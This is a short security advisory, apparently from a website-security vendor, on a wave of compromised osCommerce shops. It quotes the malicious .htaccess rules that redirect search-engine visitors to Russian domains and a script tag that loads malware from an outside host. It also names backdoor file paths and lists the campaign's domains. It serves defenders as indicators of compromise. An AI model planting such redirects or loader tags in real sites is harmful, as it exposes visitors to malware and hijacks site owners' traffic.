osCommerce attacks – kirm-sky.ru

We are seeing a very large number of osCommerce sites hacked on the last few days. If you are an osCommerce user, make sure to update it asap and check if to see if it’s been infected (also remove the file_manager.php from the admin directory).

These attacks seems to be using the same vulnerability used in previous attacks (nt02.co.in, nt04.in, etc).

The latest version consists of the following:

1 .htaccess is modified to redirect users to kirm-sky.ru, voice-nano.ru, devisionnetwork.ru, etc (just the first domain infected more than 600 sites according to Google).

This is what the .htaccess looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
..
RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]

2 A backdoor is created inside /js/conf.php and another one at /flops.php. Make sure to remove these and search for other PHP files that are not part of the official osCommerce distribution.

3 Blackhat SEO SPAM is added to includes/application_bottom.php.


All the domains used in this attack are hosted at 91.204.48.37:

kirm-ar.ru
kirmar.ru
classwoods.ru
enterteiment-wizrd.ru
class-woods.ru
relax-july.ru
ar-kirm.ru
enterteimentwizrd.ru
tecros.ru
tutaanti.ru
kirm-sky.ru
sky-ar.ru
devisionnetwork.ru
voice-nano.ru

This is how our malware scanner detects an infected site:

OsCommerce hacked

OsCommerce hacked

We will post more details as we learn more about it. This link gives some good tips on how to secure osCommerce.


If your site is hacked and you need help, contact us a support@sucuri.net or http://sucuri.net

osCommerce users, update your installations as soon as possible

If you are an osCommerce user, please make sure to update your installation (and check your sites) as soon as possible. We have been tracking multiple compromises of osCommerce installations where the attackers added this javascript malware to the affected sites:

< script src = “http://nt02.co.in/3″ >

This code is used to load malware to unsuspecting visitors of your site. Most of the sites affected also had a few PHP files inserted inside the /images folder, generally called inclasses.php, loadclasses.php or phpclasses.php.

We are still researching how those sites got hacked and which vulnerability was used. It could be this one, or some of the others recently published.

If you have more information let us know.